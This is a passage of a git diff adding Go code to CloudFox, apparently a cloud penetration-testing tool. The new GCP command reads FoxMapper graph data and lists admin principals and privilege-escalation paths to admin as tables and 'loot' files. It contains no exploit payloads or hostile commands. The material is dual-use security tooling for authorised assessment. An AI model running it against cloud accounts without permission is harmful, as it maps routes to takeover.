len(r.TargetTags) > 0 { + targets = strings.Join(r.TargetTags, ", ") + } else if len(r.TargetSAs) > 0 { + targets = strings.Join(r.TargetSAs, ", ") + } + + diagramRules = append(diagramRules, diagramservice.FirewallRuleInfo{ + Name: r.Name, + Direction: r.Direction, + Priority: r.Priority, + SourceRanges: r.SourceRanges, + AllowedPorts: allowedPorts, + TargetTags: targets, + IsPublicIngress: r.IsPublicIngress, + Disabled: r.Disabled, + }) + } + + sb.WriteString(diagramservice.DrawFirewallDiagram(diagramRules, networkName, projectID, width)) + sb.WriteString("\n") + } + + return sb.String() +} + +// Helper functions + +// formatProtocols formats allowed/denied protocols for display +func formatProtocols(protocols map[string][]string) string { + var parts []string + for proto, ports := range protocols { + if len(ports) == 0 { + parts = append(parts, proto+":all") + } else { + parts = append(parts, proto+":"+strings.Join(ports, ",")) + } + } + return strings.Join(parts, "; ") +} + diff --git a/gcp/commands/foxmapper.go b/gcp/commands/foxmapper.go new file mode 100755 index 00000000..f9c89345 --- /dev/null +++ b/gcp/commands/foxmapper.go @@ -0,0 +1,989 @@ +package commands + +import ( + "context" + "fmt" + "path/filepath" + "sort" + "strconv" + "strings" + "sync" + + foxmapperservice "github.com/BishopFox/cloudfox/gcp/services/foxmapperService" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPFoxMapperCommand = &cobra.Command{ + Use: "foxmapper", + Aliases: []string{"fm", "pmapper"}, + Short: "Display privilege escalation data from FoxMapper graphs", + Long: `Display and analyze privilege escalation paths from FoxMapper graph data. + +This command reads FoxMapper graph data (generated by 'foxmapper gcp graph create') +and displays privilege escalation analysis results. It's the GCP equivalent of +CloudFox's AWS pmapper integration. + +FoxMapper creates a graph of principals (service accounts, users, groups) and +privilege escalation edges between them. This command queries that graph to: + +1. List all admin principals +2. List all principals with paths to admin +3. Display detailed escalation paths +4. Show statistics and summaries + +FoxMapper data locations (checked in order): +- Linux: ~/.local/share/foxmapper/gcp/{org_id or project_id}/ +- macOS: ~/Library/Application Support/foxmapper/gcp/{org_id or project_id}/ +- Windows: %APPDATA%/foxmapper/gcp/{org_id or project_id}/ + +To generate FoxMapper data, run: + foxmapper gcp graph create --org {org_id} + foxmapper gcp graph create --project {project_id} + +Examples: + # Display privesc analysis for an organization + cloudfox gcp foxmapper --org 123456789 + + # Display privesc analysis for a specific project + cloudfox gcp foxmapper --project my-project + + # Use a custom FoxMapper data path + cloudfox gcp foxmapper --foxmapper-path /path/to/foxmapper/gcp/123456789`, + Run: runGCPFoxMapperCommand, +} + +// Module-specific flags +var ( + foxmapperOrgID string + foxmapperProjectID string + foxmapperDataPath string +) + +func init() { + GCPFoxMapperCommand.Flags().StringVar(&foxmapperOrgID, "org", "", "Organization ID to analyze") + GCPFoxMapperCommand.Flags().StringVar(&foxmapperProjectID, "project", "", "Project ID to analyze (if not using org)") + GCPFoxMapperCommand.Flags().StringVar(&foxmapperDataPath, "foxmapper-path", "", "Custom path to FoxMapper data directory") +} + +// FoxMapperModule holds the state for the FoxMapper command +type FoxMapperModule struct { + gcpinternal.BaseGCPModule + + FoxMapper *foxmapperservice.FoxMapperService + OrgID string + ProjectID string + DataPath string + OrgCache *gcpinternal.OrgCache + + // Output data + Admins []*foxmapperservice.Node + NodesWithPrivesc []*foxmapperservice.Node + Summary map[string]interface{} + LootMap map[string]*internal.LootFile + + mu sync.Mutex +} + +type FoxMapperOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o FoxMapperOutput) TableFiles() []internal.TableFile { return o.Table } +func (o FoxMapperOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPFoxMapperCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, "foxmapper") + if err != nil { + return + } + + module := &FoxMapperModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + FoxMapper: foxmapperservice.New(), + OrgID: foxmapperOrgID, + ProjectID: foxmapperProjectID, + DataPath: foxmapperDataPath, + LootMap: make(map[string]*internal.LootFile), + } + + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *FoxMapperModule) Execute(ctx context.Context, logger internal.Logger) { + // Get OrgCache for project number resolution + m.OrgCache = gcpinternal.GetOrgCacheFromContext(ctx) + + logger.InfoM("Looking for FoxMapper data and building privilege escalation graph...", "foxmapper") + + // Custom path specified - load directly + if m.DataPath != "" { + if err := m.FoxMapper.LoadGraphFromPath(m.DataPath); err != nil { + logger.ErrorM(fmt.Sprintf("Failed to load FoxMapper data from path: %v", err), "foxmapper") + return + } + m.analyzeAndOutput(ctx, logger, m.DataPath) + return + } + + // Specific org specified + if m.OrgID != "" { + if err := m.FoxMapper.LoadGraph(m.OrgID, true); err != nil { + logger.ErrorM(fmt.Sprintf("Failed to load FoxMapper data for org %s: %v", m.OrgID, err), "foxmapper") + fmt.Printf("\nTo generate FoxMapper data, run:\n foxmapper gcp graph create --org %s\n", m.OrgID) + return + } + m.analyzeAndOutput(ctx, logger, m.OrgID) + return + } + + // Specific project specified via module flag + if m.ProjectID != "" { + if err := m.FoxMapper.LoadGraph(m.ProjectID, false); err != nil { + logger.ErrorM(fmt.Sprintf("Failed to load FoxMapper data for project %s: %v", m.ProjectID, err), "foxmapper") + fmt.Printf("\nTo generate FoxMapper data, run:\n foxmapper gcp graph create --project %s\n", m.ProjectID) + return + } + m.analyzeAndOutput(ctx, logger, m.ProjectID) + return + } + + // No specific identifier - try org from hierarchy, then iterate projects + orgID := "" + if m.Hierarchy != nil && len(m.Hierarchy.Organizations) > 0 { + orgID = m.Hierarchy.Organizations[0].ID + } + + // Try org-level graph first (covers all projects) + if orgID != "" { + if err := m.FoxMapper.LoadGraph(orgID, true); err == nil { + logger.InfoM(fmt.Sprintf("Loaded org-level FoxMapper graph for org: %s", orgID), "foxmapper") + m.analyzeAndOutput(ctx, logger, orgID) + return + } + } + + // No org graph - try each project + if len(m.ProjectIDs) == 0 { + logger.ErrorM("No organization or project specified. Use --org or --project flag.", "foxmapper") + logger.InfoM("To generate FoxMapper data, run:", "foxmapper") + logger.InfoM(" foxmapper gcp graph create --org {org_id}", "foxmapper") + logger.InfoM(" foxmapper gcp graph create --project {project_id}", "foxmapper") + return + } + + // Build hierarchical output for per-project analysis + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + foundAny := false + for _, projectID := range m.ProjectIDs { + // Create fresh FoxMapper service for each project + projectFM := foxmapperservice.New() + if err := projectFM.LoadGraph(projectID, false); err != nil { + // No FoxMapper data for this project - skip silently + continue + } + + foundAny = true + logger.InfoM(fmt.Sprintf("Loaded FoxMapper graph for project %s: %d nodes, %d edges", + projectID, len(projectFM.Nodes), len(projectFM.Edges)), "foxmapper") + + // Analyze this project + admins := projectFM.GetAdminNodes() + nodesWithPrivesc := projectFM.GetNodesWithPrivesc() + summary := projectFM.GetPrivescSummary() + + // Generate output for this project + output := m.generateOutputForProject(logger, projectID, projectFM, admins, nodesWithPrivesc, summary) + outputData.ProjectLevelData[projectID] = output + + // Print summary for this project + m.printProjectSummary(logger, projectID, summary) + } + + if !foundAny { + logger.ErrorM("No FoxMapper data found for any project.", "foxmapper") + fmt.Println("\nTo generate FoxMapper data, run:") + fmt.Println(" foxmapper gcp graph create --org {org_id}") + fmt.Println(" foxmapper gcp graph create --project {project_id}") + fmt.Println("\nFor more info: https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#foxmapper") + return + } + + // Write hierarchical output + pathBuilder := m.BuildPathBuilder() + if err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData); err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), "foxmapper") + } +} + +// analyzeAndOutput analyzes a single loaded FoxMapper graph and writes output +func (m *FoxMapperModule) analyzeAndOutput(ctx context.Context, logger internal.Logger, identifier string) { + logger.InfoM(fmt.Sprintf("Loaded FoxMapper graph: %d nodes, %d edges", + len(m.FoxMapper.Nodes), len(m.FoxMapper.Edges)), "foxmapper") + + // Get analysis data + m.Admins = m.FoxMapper.GetAdminNodes() + m.NodesWithPrivesc = m.FoxMapper.GetNodesWithPrivesc() + m.Summary = m.FoxMapper.GetPrivescSummary() + + // Generate output + output := m.generateOutput(logger, identifier) + + // For org-level or single identifier, use hierarchical output at org level + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + outputData.OrgLevelData[identifier] = output + + pathBuilder := m.BuildPathBuilder() + if err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData); err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), "foxmapper") + } + + // Print summary + m.printSummary(logger, identifier) +} + +// generateOutputForProject generates output for a specific project's FoxMapper data +func (m *FoxMapperModule) generateOutputForProject(logger internal.Logger, projectID string, fm *foxmapperservice.FoxMapperService, admins []*foxmapperservice.Node, nodesWithPrivesc []*foxmapperservice.Node, summary map[string]interface{}) FoxMapperOutput { + var output FoxMapperOutput + + // Main table: principals with admin or path to admin + // Read left to right: Project -> Type -> Principal -> Admin Status -> Privesc Target -> Privesc Admin Level -> Hops + mainHeader := []string{"Project", "Type", "Principal", "Is Admin", "Admin Level", "Privesc To", "Privesc Admin Level", "Hops", "Confidence"} + var mainBody [][]string + + // First add admins + for _, admin := range admins { + adminLevel := admin.AdminLevel + if adminLevel == "" { + adminLevel = "project" + } + mainBody = append(mainBody, []string{ + admin.ProjectID, + admin.MemberType, + admin.Email, + "Yes", + adminLevel, + "-", + "-", + "-", + "-", + }) + } + + // Then add nodes with privesc paths + for _, node := range nodesWithPrivesc { + paths := fm.GetPrivescPaths(node.Email) + shortestPath := "-" + privescTo := "-" + privescAdminLevel := "-" + confidence := "-" + if len(paths) > 0 { + bestPath := paths[0] + shortestPath = strconv.Itoa(bestPath.HopCount) + // Get the destination (admin) from the best path + privescTo = bestPath.Destination + // Clean up the display + if strings.HasPrefix(privescTo, "serviceAccount:") { + privescTo = strings.TrimPrefix(privescTo, "serviceAccount:") + } else if strings.HasPrefix(privescTo, "user:") { + privescTo = strings.TrimPrefix(privescTo, "user:") + } + + // Confidence from the best path + confidence = bestPath.Confidence + if confidence == "" { + confidence = "high" + } + + // Format privesc admin level + destNode := fm.GetNode(bestPath.Destination) + switch bestPath.AdminLevel { + case "org": + privescAdminLevel = "Org" + case "folder": + // Try to extract folder from the destination node's IAM bindings + if destNode != nil && len(destNode.IAMBindings) > 0 { + for _, binding := range destNode.IAMBindings { + if resource, ok := binding["resource"].(string); ok { + if strings.HasPrefix(resource, "folders/") { + folderID := strings.TrimPrefix(resource, "folders/") + privescAdminLevel = fmt.Sprintf("Folder: %s", folderID) + break + } + } + } + } + if privescAdminLevel == "-" { + privescAdminLevel = "Folder" + } + case "project": + // Try to get the project ID from the destination node or principal + if destNode != nil && destNode.ProjectID != "" { + privescAdminLevel = fmt.Sprintf("Project: %s", destNode.ProjectID) + } else { + destProject := extractProjectFromPrincipal(bestPath.Destination, m.OrgCache) + if destProject != "" { + privescAdminLevel = fmt.Sprintf("Project: %s", destProject) + } else { + privescAdminLevel = "Project" + } + } + default: + if bestPath.AdminLevel != "" { + privescAdminLevel = bestPath.AdminLevel + } + } + } + mainBody = append(mainBody, []string{ + node.ProjectID, + node.MemberType, + node.Email, + "No", + "-", + privescTo, + privescAdminLevel, + shortestPath, + confidence, + }) + } + + output.Table = append(output.Table, internal.TableFile{ + Header: mainHeader, + Body: mainBody, + Name: "foxmapper", + }) + + // Loot file - summary + lootContent := m.generateLootContentForProject(projectID, fm, admins, nodesWithPrivesc, summary) + output.Loot = append(output.Loot, internal.LootFile{ + Name: "foxmapper", + Contents: lootContent, + }) + + // Loot file - detailed paths (paths go to loot only, not table/csv/json) + pathsLootContent := m.generatePathsLootContentForProject(projectID, fm, nodesWithPrivesc) + output.Loot = append(output.Loot, internal.LootFile{ + Name: "foxmapper-paths", + Contents: pathsLootContent, + }) + + return output +} + +// generatePathsLootContentForProject generates detailed paths loot for a specific project +func (m *FoxMapperModule) generatePathsLootContentForProject(projectID string, fm *foxmapperservice.FoxMapperService, nodesWithPrivesc []*foxmapperservice.Node) string { + var sb strings.Builder + + sb.WriteString("# FoxMapper Privilege Escalation Paths\n") + sb.WriteString(fmt.Sprintf("# Project: %s\n", projectID)) + sb.WriteString(fmt.Sprintf("# Total paths: %d principals with escalation paths\n\n", len(nodesWithPrivesc))) + + for _, node := range nodesWithPrivesc { + paths := fm.GetPrivescPaths(node.Email) + if len(paths) == 0 { + continue + } + + sb.WriteString(fmt.Sprintf("================================================================================\n")) + sb.WriteString(fmt.Sprintf("SOURCE: %s (%s)\n", node.Email, node.MemberType)) + sb.WriteString(fmt.Sprintf("Project: %s\n", node.ProjectID)) + sb.WriteString(fmt.Sprintf("Escalation paths: %d\n", len(paths))) + sb.WriteString(fmt.Sprintf("================================================================================\n\n")) + + for pathIdx, path := range paths { + scopeStatus := "" + if path.ScopeBlocked { + scopeStatus = " [SCOPE-BLOCKED]" + } + confidenceStatus := "" + if path.Confidence != "" && path.Confidence != "high" { + confidenceStatus = fmt.Sprintf(" [%s confidence]", path.Confidence) + } + + sb.WriteString(fmt.Sprintf("--- Path %d: %s → %s (%s admin, %d hops)%s%s ---\n\n", + pathIdx+1, path.Source, path.Destination, path.AdminLevel, path.HopCount, scopeStatus, confidenceStatus)) + + // Show the path as a visual chain + sb.WriteString(fmt.Sprintf(" %s\n", path.Source)) + for i, edge := range path.Edges { + sb.WriteString(" │\n") + + annotations := "" + if edge.ScopeBlocksEscalation { + annotations = " ⚠️ BLOCKED BY OAUTH SCOPE" + } else if edge.ScopeLimited { + annotations = " ⚠️ scope-limited" + } + edgeConf := edge.EffectiveConfidence() + if edgeConf != "high" { + annotations += fmt.Sprintf(" [%s confidence]", edgeConf) + } + + sb.WriteString(fmt.Sprintf(" ├── [%d] %s%s\n", i+1, edge.ShortReason, annotations)) + + if edge.Resource != "" { + sb.WriteString(fmt.Sprintf(" │ Resource: %s\n", edge.Resource)) + } + + if edge.Reason != "" && edge.Reason != edge.ShortReason { + reason := edge.Reason + if len(reason) > 80 { + sb.WriteString(fmt.Sprintf(" │ %s\n", reason[:80])) + sb.WriteString(fmt.Sprintf(" │ %s\n", reason[80:])) + } else { + sb.WriteString(fmt.Sprintf(" │ %s\n", reason)) + } + } + + if i < len(path.Edges)-1 { + sb.WriteString(fmt.Sprintf(" │\n")) + sb.WriteString(fmt.Sprintf(" ▼\n")) + sb.WriteString(fmt.Sprintf(" %s\n", edge.Destination)) + } else { + sb.WriteString(fmt.Sprintf(" │\n")) + sb.WriteString(fmt.Sprintf(" └──▶ %s (ADMIN)\n", edge.Destination)) + } + } + sb.WriteString("\n") + } + sb.WriteString("\n") + } + + return sb.String() +} + +// generateLootContentForProject generates loot content for a specific project +func (m *FoxMapperModule) generateLootContentForProject(projectID string, fm *foxmapperservice.FoxMapperService, admins []*foxmapperservice.Node, nodesWithPrivesc []*foxmapperservice.Node, summary map[string]interface{}) string { + var sb strings.Builder + + sb.WriteString("=== FoxMapper Privilege Escalation Analysis ===\n\n") + sb.WriteString(fmt.Sprintf("Project: %s\n", projectID)) + sb.WriteString(fmt.Sprintf("Total Nodes: %d\n", summary["total_nodes"])) + sb.WriteString(fmt.Sprintf("Admin Nodes: %d\n", summary["admin_nodes"])) + sb.WriteString(fmt.Sprintf("Nodes with Privesc: %d\n", summary["nodes_with_privesc"])) + sb.WriteString(fmt.Sprintf("Percent with Privesc: %.1f%%\n\n", summary["percent_with_privesc"])) + + // Admin breakdown + sb.WriteString("=== Admin Breakdown ===\n") + sb.WriteString(fmt.Sprintf(" Organization Admins: %d\n", summary["org_admins"])) + sb.WriteString(fmt.Sprintf(" Folder Admins: %d\n", summary["folder_admins"])) + sb.WriteString(fmt.Sprintf(" Project Admins: %d\n\n", summary["project_admins"])) + + // List admins + sb.WriteString("=== Admin Principals ===\n") + for _, admin := range admins { + adminLevel := admin.AdminLevel + if adminLevel == "" { + adminLevel = "project" + } + sb.WriteString(fmt.Sprintf("ADMIN (%s): %s\n", adminLevel, admin.Email)) + } + sb.WriteString("\n") + + // List privesc paths + sb.WriteString("=== Privilege Escalation Paths ===\n\n") + for _, node := range nodesWithPrivesc { + paths := fm.GetPrivescPaths(node.Email) + for _, path := range paths { + sb.WriteString(fmt.Sprintf("PATH TO %s ADMIN FOUND\n", strings.ToUpper(path.AdminLevel))) + sb.WriteString(fmt.Sprintf(" Start: %s\n", path.Source)) + sb.WriteString(fmt.Sprintf(" End: %s\n", path.Destination)) + sb.WriteString(fmt.Sprintf(" Hops: %d\n", path.HopCount)) + if path.Confidence != "" && path.Confidence != "high" { + sb.WriteString(fmt.Sprintf(" Confidence: %s\n", path.Confidence)) + } + if path.ScopeBlocked { + sb.WriteString(" WARNING: Path may be blocked by OAuth scopes\n") + } + sb.WriteString(" Path:\n") + for i, edge := range path.Edges { + annotations := "" + if edge.ScopeBlocksEscalation { + annotations = " [BLOCKED BY SCOPE]" + } else if edge.ScopeLimited { + annotations = " [scope-limited]" + } + edgeConf := edge.EffectiveConfidence() + if edgeConf != "high" { + annotations += fmt.Sprintf(" [%s confidence]", edgeConf) + } + sb.WriteString(fmt.Sprintf(" (%d) %s%s\n", i+1, edge.Reason, annotations)) + } + sb.WriteString("\n") + } + } + + return sb.String() +} + +// printProjectSummary prints a summary for a single project +func (m *FoxMapperModule) printProjectSummary(logger internal.Logger, projectID string, summary map[string]interface{}) { + totalNodes, _ := summary["total_nodes"].(int) + adminNodes, _ := summary["admin_nodes"].(int) + nodesWithPrivesc, _ := summary["nodes_with_privesc"].(int) + + logger.InfoM(fmt.Sprintf("[%s] %d principals, %d admins, %d with privesc path", + projectID, totalNodes, adminNodes, nodesWithPrivesc), "foxmapper") +} + +func (m *FoxMapperModule) generateOutput(logger internal.Logger, identifier string) FoxMapperOutput { + var output FoxMapperOutput + + // Main table: principals with admin or path to admin + // Read left to right: Project -> Type -> Principal -> Admin Status -> Privesc Target -> Privesc Admin Level -> Hops + mainHeader := []string{"Project", "Type", "Principal", "Is Admin", "Admin Level", "Privesc To", "Privesc Admin Level", "Hops", "Confidence"} + var mainBody [][]string + + // First add admins + for _, admin := range m.Admins { + adminLevel := admin.AdminLevel + if adminLevel == "" { + adminLevel = "project" + } + mainBody = append(mainBody, []string{ + admin.ProjectID, + admin.MemberType, + admin.Email, + "Yes", + adminLevel, + "-", + "-", + "-", + "-", + }) + } + + // Then add nodes with privesc paths + for _, node := range m.NodesWithPrivesc { + paths := m.FoxMapper.GetPrivescPaths(node.Email) + shortestPath := "-" + privescTo := "-" + privescAdminLevel := "-" + confidence := "-" + if len(paths) > 0 { + bestPath := paths[0] + shortestPath = strconv.Itoa(bestPath.HopCount) + // Get the destination (admin) from the best path + privescTo = bestPath.Destination + // Clean up the display + if strings.HasPrefix(privescTo, "serviceAccount:") { + privescTo = strings.TrimPrefix(privescTo, "serviceAccount:") + } else if strings.HasPrefix(privescTo, "user:") { + privescTo = strings.TrimPrefix(privescTo, "user:") + } + + // Confidence from the best path + confidence = bestPath.Confidence + if confidence == "" { + confidence = "high" + } + + // Format privesc admin level + destNode := m.FoxMapper.GetNode(bestPath.Destination) + switch bestPath.AdminLevel { + case "org": + privescAdminLevel = "Org" + case "folder": + // Try to extract folder from the destination node's IAM bindings + if destNode != nil && len(destNode.IAMBindings) > 0 { + for _, binding := range destNode.IAMBindings { + if resource, ok := binding["resource"].(string); ok { + if strings.HasPrefix(resource, "folders/") { + folderID := strings.TrimPrefix(resource, "folders/") + privescAdminLevel = fmt.Sprintf("Folder: %s", folderID) + break + } + } + } + } + if privescAdminLevel == "-" { + privescAdminLevel = "Folder" + } + case "project": + // Try to get the project ID from the destination node or principal + if destNode != nil && destNode.ProjectID != "" { + privescAdminLevel = fmt.Sprintf("Project: %s", destNode.ProjectID) + } else { + destProject := extractProjectFromPrincipal(bestPath.Destination, m.OrgCache) + if destProject != "" { + privescAdminLevel = fmt.Sprintf("Project: %s", destProject) + } else { + privescAdminLevel = "Project" + } + } + default: + if bestPath.AdminLevel != "" { + privescAdminLevel = bestPath.AdminLevel + } + } + } + mainBody = append(mainBody, []string{ + node.ProjectID, + node.MemberType, + node.Email, + "No", + "-", + privescTo, + privescAdminLevel, + shortestPath, + confidence, + }) + } + + output.Table = append(output.Table, internal.TableFile{ + Header: mainHeader, + Body: mainBody, + Name: "foxmapper", + }) + + // Detailed paths loot file with full exploitation steps (paths go to loot only, not table/csv/json) + pathsLootContent := m.generatePathsLootContent(identifier) + output.Loot = append(output.Loot, internal.LootFile{ + Name: "foxmapper-paths", + Contents: pathsLootContent, + }) + + // Loot file with full details + lootContent := m.generateLootContent(identifier) + output.Loot = append(output.Loot, internal.LootFile{ + Name: "foxmapper", + Contents: lootContent, + }) + + return output +} + +func (m *FoxMapperModule) generatePathsLootContent(identifier string) string { + var sb strings.Builder + + sb.WriteString("# FoxMapper Privilege Escalation Paths\n") + sb.WriteString(fmt.Sprintf("# Identifier: %s\n", identifier)) + sb.WriteString(fmt.Sprintf("# Total paths: %d principals with escalation paths\n\n", len(m.NodesWithPrivesc))) + + for _, node := range m.NodesWithPrivesc { + paths := m.FoxMapper.GetPrivescPaths(node.Email) + if len(paths) == 0 { + continue + } + + sb.WriteString(fmt.Sprintf("================================================================================\n")) + sb.WriteString(fmt.Sprintf("SOURCE: %s (%s)\n", node.Email, node.MemberType)) + sb.WriteString(fmt.Sprintf("Project: %s\n", node.ProjectID)) + sb.WriteString(fmt.Sprintf("Escalation paths: %d\n", len(paths))) + sb.WriteString(fmt.Sprintf("================================================================================\n\n")) + + for pathIdx, path := range paths { + scopeStatus := "" + if path.ScopeBlocked { + scopeStatus = " [SCOPE-BLOCKED]" + } + + sb.WriteString(fmt.Sprintf("--- Path %d: %s → %s (%s admin, %d hops)%s ---\n\n", + pathIdx+1, path.Source, path.Destination, path.AdminLevel, path.HopCount, scopeStatus)) + + // Show the path as a visual chain + sb.WriteString(fmt.Sprintf(" %s\n", path.Source)) + for i, edge := range path.Edges { + // Connector + if i < len(path.Edges)-1 { + sb.WriteString(" │\n") + } else { + sb.WriteString(" │\n") + } + + // Scope warning + scopeWarning := "" + if edge.ScopeBlocksEscalation { + scopeWarning = " ⚠️ BLOCKED BY OAUTH SCOPE" + } else if edge.ScopeLimited { + scopeWarning = " ⚠️ scope-limited" + } + + // The technique/reason + sb.WriteString(fmt.Sprintf(" ├── [%d] %s%s\n", i+1, edge.ShortReason, scopeWarning)) + + // Resource if available + if edge.Resource != "" { + sb.WriteString(fmt.Sprintf(" │ Resource: %s\n", edge.Resource)) + } + + // Full reason/description + if edge.Reason != "" && edge.Reason != edge.ShortReason { + // Wrap long reasons + reason := edge.Reason + if len(reason) > 80 { + sb.WriteString(fmt.Sprintf(" │ %s\n", reason[:80])) + sb.WriteString(fmt.Sprintf(" │ %s\n", reason[80:])) + } else { + sb.WriteString(fmt.Sprintf(" │ %s\n", reason)) + } + } + + // Show destination after this hop + if i < len(path.Edges)-1 { + sb.WriteString(fmt.Sprintf(" │\n")) + sb.WriteString(fmt.Sprintf(" ▼\n")) + sb.WriteString(fmt.Sprintf(" %s\n", edge.Destination)) + } else { + sb.WriteString(fmt.Sprintf(" │\n")) + sb.WriteString(fmt.Sprintf(" └──▶ %s (ADMIN)\n", edge.Destination)) + } + } + sb.WriteString("\n") + } + sb.WriteString("\n") + } + + return sb.String() +} + +func (m *FoxMapperModule) generateLootContent(identifier string) string { + var sb strings.Builder + + sb.WriteString("=== FoxMapper Privilege Escalation Analysis ===\n\n") + sb.WriteString(fmt.Sprintf("Identifier: %s\n", identifier)) + sb.WriteString(fmt.Sprintf("Total Nodes: %d\n", m.Summary["total_nodes"])) + sb.WriteString(fmt.Sprintf("Admin Nodes: %d\n", m.Summary["admin_nodes"])) + sb.WriteString(fmt.Sprintf("Nodes with Privesc: %d\n", m.Summary["nodes_with_privesc"])) + sb.WriteString(fmt.Sprintf("Percent with Privesc: %.1f%%\n\n", m.Summary["percent_with_privesc"])) + + // Admin breakdown + sb.WriteString("=== Admin Breakdown ===\n") + sb.WriteString(fmt.Sprintf(" Organization Admins: %d\n", m.Summary["org_admins"])) + sb.WriteString(fmt.Sprintf(" Folder Admins: %d\n", m.Summary["folder_admins"])) + sb.WriteString(fmt.Sprintf(" Project Admins: %d\n\n", m.Summary["project_admins"])) + + // List admins + sb.WriteString("=== Admin Principals ===\n") + for _, admin := range m.Admins { + adminLevel := admin.AdminLevel + if adminLevel == "" { + adminLevel = "project" + } + sb.WriteString(fmt.Sprintf("ADMIN (%s): %s\n", adminLevel, admin.Email)) + } + sb.WriteString("\n") + + // List privesc paths + sb.WriteString("=== Privilege Escalation Paths ===\n\n") + for _, node := range m.NodesWithPrivesc { + paths := m.FoxMapper.GetPrivescPaths(node.Email) + for _, path := range paths { + sb.WriteString(fmt.Sprintf("PATH TO %s ADMIN FOUND\n", strings.ToUpper(path.AdminLevel))) + sb.WriteString(fmt.Sprintf(" Start: %s\n", path.Source)) + sb.WriteString(fmt.Sprintf(" End: %s\n", path.Destination)) + sb.WriteString(fmt.Sprintf(" Hops: %d\n", path.HopCount)) + if path.Confidence != "" && path.Confidence != "high" { + sb.WriteString(fmt.Sprintf(" Confidence: %s\n", path.Confidence)) + } + if path.ScopeBlocked { + sb.WriteString(" WARNING: Path may be blocked by OAuth scopes\n") + } + sb.WriteString(" Path:\n") + for i, edge := range path.Edges { + annotations := "" + if edge.ScopeBlocksEscalation { + annotations = " [BLOCKED BY SCOPE]" + } else if edge.ScopeLimited { + annotations = " [scope-limited]" + } + edgeConf := edge.EffectiveConfidence() + if edgeConf != "high" { + annotations += fmt.Sprintf(" [%s confidence]", edgeConf) + } + sb.WriteString(fmt.Sprintf(" (%d) %s%s\n", i+1, edge.Reason, annotations)) + } + sb.WriteString("\n") + } + } + + return sb.String() +} + +func (m *FoxMapperModule) printSummary(logger internal.Logger, identifier string) { + totalNodes, _ := m.Summary["total_nodes"].(int) + adminNodes, _ := m.Summary["admin_nodes"].(int) + nodesWithPrivesc, _ := m.Summary["nodes_with_privesc"].(int) + + logger.InfoM(fmt.Sprintf("Analysis complete for: %s", identifier), "foxmapper") + logger.InfoM(fmt.Sprintf("Total principals: %d", totalNodes), "foxmapper") + logger.InfoM(fmt.Sprintf("Admin principals: %d", adminNodes), "foxmapper") + logger.InfoM(fmt.Sprintf("Principals with path to admin: %d", nodesWithPrivesc), "foxmapper") + + if nodesWithPrivesc > 0 { + percent, _ := m.Summary["percent_with_privesc"].(float64) + logger.InfoM(fmt.Sprintf("Percent with privesc: %.1f%%", percent), "foxmapper") + } + + // Output file location + outputDir := filepath.Join(m.OutputDirectory, "cloudfox-output", "gcp", m.Account) + logger.InfoM(fmt.Sprintf("Output written to: %s", outputDir), "foxmapper") + logger.InfoM("For detailed paths, see the loot file: foxmapper.txt", "foxmapper") +} + +// ============================================================================ +// FoxMapper Cache for use by other modules +// ============================================================================ + +// FoxMapperCache wraps FoxMapperService for use by other modules +type FoxMapperCache struct { + service *foxmapperservice.FoxMapperService + populated bool + identifier string +} + +// NewFoxMapperCache creates a new FoxMapper cache +func NewFoxMapperCache() *FoxMapperCache { + return &FoxMapperCache{ + service: foxmapperservice.New(), + } +} + +// LoadFromOrg loads FoxMapper data for an organization +func (c *FoxMapperCache) LoadFromOrg(orgID string) error { + err := c.service.LoadGraph(orgID, true) + if err != nil { + return err + } + c.populated = true + c.identifier = orgID + return nil +} + +// LoadFromProject loads FoxMapper data for a project +func (c *FoxMapperCache) LoadFromProject(projectID string) error { + err := c.service.LoadGraph(projectID, false) + if err != nil { + return err + } + c.populated = true + c.identifier = projectID + return nil +} + +// LoadFromPath loads FoxMapper data from a custom path +func (c *FoxMapperCache) LoadFromPath(path string) error { + err := c.service.LoadGraphFromPath(path) + if err != nil { + return err + } + c.populated = true + c.identifier = path + return nil +} + +// TryLoad attempts to load FoxMapper data, trying org first then project +func (c *FoxMapperCache) TryLoad(orgID, projectID string) error { + // Try org first + if orgID != "" { + if err := c.LoadFromOrg(orgID); err == nil { + return nil + } + } + // Try project + if projectID != "" { + if err := c.LoadFromProject(projectID); err == nil { + return nil + } + } + return fmt.Errorf("could not load FoxMapper data for org %s or project %s", orgID, projectID) +} + +// IsPopulated returns whether the cache has data +func (c *FoxMapperCache) IsPopulated() bool { + return c.populated +} + +// GetAttackSummary returns attack path summary for a principal +func (c *FoxMapperCache) GetAttackSummary(principal string) string { + if !c.populated { + return "run foxmapper" + } + return c.service.GetAttackSummary(principal) +} + +// DoesPrincipalHavePathToAdmin checks if principal can escalate +func (c *FoxMapperCache) DoesPrincipalHavePathToAdmin(principal string) bool { + if !c.populated { + return false + } + return c.service.DoesPrincipalHavePathToAdmin(principal) +} + +// IsPrincipalAdmin checks if principal is admin +func (c *FoxMapperCache) IsPrincipalAdmin(principal string) bool { + if !c.populated { + return false + } + return c.service.IsPrincipalAdmin(principal) +} + +// GetPrivescPaths returns privesc paths for a principal +func (c *FoxMapperCache) GetPrivescPaths(principal string) []foxmapperservice.PrivescPath { + if !c.populated { + return nil + } + return c.service.GetPrivescPaths(principal) +} + +// GetService returns the underlying FoxMapper service +func (c *FoxMapperCache) GetService() *foxmapperservice.FoxMapperService { + return c.service +} + +// ============================================================================ +// Helper to find and load FoxMapper data +// ============================================================================ + +// FindAndLoadFoxMapper attempts to find and load FoxMapper data +// Returns the loaded cache or 